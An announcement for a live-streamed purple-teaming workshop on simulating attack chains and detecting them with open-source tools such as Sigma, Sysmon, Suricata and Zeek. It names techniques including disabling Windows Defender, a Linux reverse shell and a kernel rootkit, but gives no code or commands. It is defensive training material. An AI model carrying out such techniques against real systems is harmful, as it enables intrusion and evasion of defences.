DELIVERY: VIRTUAL LIVE STREAM
DISCORD : https://discord.gg/XM86uPxxBZ
DATE: 16 March 2021
TIME: 19:00 to 21:00 CET/GMT+1
The first workshop of the PurpleLabs series generated a great deal of interest in the scope of detection and threat hunting!
For the first 5 registrations, Leszek will provide 7 days of full access to the PurpleLabs environment supplied with a set of 60+ hands-on lab instructions in the purple teaming structure.
During the #1 session, we have covered how to get network and OS visibility/telemetry needed for advanced detection with Open Source / free tools. We’ve run few simple hunting examples and demonstrated how to use Sigma / Sentinel rules as hints/guides to learn more in the ‘detection vs attack’ formula.
We need to keep learning how adversaries are operating, so after a good introduction to the subject, it’s time for the next step.
During hands-on session #2*, Leszek is going to demonstrate how to create and simulate chain attack steps:
- Rundll32 communicating with public IP addresses
- CMSTP Execution
- Mshta executing VBScript
- Disabling Windows Defender / modifying Windows Firewall
- Suspicious non-browser attempts to access suspicious URL
- Suspicious scheduled task creation
- Powershell execution with IP arguments
- Malicious Named Pipe
- Suspicious Linux Reverse Shell Command Line
- Linux kernel space rootkit
- and more
and provide detection coverage for the tools, techniques, and procedures by using PurpleLabs stack:
- HELK + ElastAlert
- Sigma rules
- Sysmon + Windows Events
- Moloch FPC
- Suricata IDS
- Zeek IDS
* This is a continuation of the topic from the first session.
For those who want to know more about this hands-on cyber range project, here’s the all-in-one picture:
Key Learning Objectives
- Find out how Detection / Hunting Open Source Software can support your SOC infrastructure & team.
- Learn ways to improve detection and sharpen your event correlation skills across many different data sources
- Generate evil, find the malicious activities, and identify threat details on the network
- Prepare your SOC team for fast filtering out network noise and allow for better incident response handling
- Understand values of a manual and automated approach to simulate attackers and generate anomalies